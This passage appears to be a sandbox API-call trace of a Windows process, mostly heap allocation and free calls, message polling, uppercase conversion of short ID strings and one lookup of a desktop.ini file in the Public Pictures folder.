[0267.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0267.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0267.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0267.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0267.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0267.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0267.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0267.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0267.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0267.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0267.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0267.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0267.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0267.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0267.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0267.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0267.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0267.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0267.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0267.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0267.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0267.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0267.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0267.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0267.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0267.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0267.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0267.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0267.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0267.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0267.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0267.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0267.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0267.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0267.746] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0267.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0267.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0267.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0267.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0267.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0267.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0267.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.747] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0267.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0267.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0267.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0267.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0267.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0267.747] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0267.747] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0267.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0267.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0267.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0267.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0267.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0267.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0267.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0267.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0267.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0267.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0267.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0267.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0267.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0267.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0267.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0267.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0267.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0267.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0267.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0267.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0267.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0267.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0267.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0267.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0267.749] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0267.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0267.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0267.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0267.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0267.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0267.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0267.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0267.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0267.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0267.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0267.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0267.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0267.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0267.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0267.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0267.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0267.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0267.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0267.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0267.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0267.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0267.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0267.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0267.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0267.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0267.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0267.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0267.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0267.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0267.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0267.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0267.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0267.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0267.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0267.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0267.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0267.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0267.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0267.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0267.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0267.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0267.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0267.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.751] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0267.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0267.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0267.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0267.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0267.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0267.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0267.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0267.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0267.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0267.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0267.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0267.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0267.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0267.752] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0267.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0267.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0267.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0267.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0267.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0267.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0267.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0267.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0267.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0267.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0267.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0267.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0267.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0267.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.753] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures/desktop.ini", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x8ed0047, dwReserved1=0x2a798, cFileName="desktop.ini", cAlternateFileName="")) returned 0xaa5760 [0267.753] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0267.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0267.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0267.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0267.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0267.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.754] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0267.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0267.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0267.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0267.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0267.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0267.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0267.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0267.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0267.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0267.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0267.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0267.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0267.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0267.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.756] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0267.756] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0267.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0267.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0267.756] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0267.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0267.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.756] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0267.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: 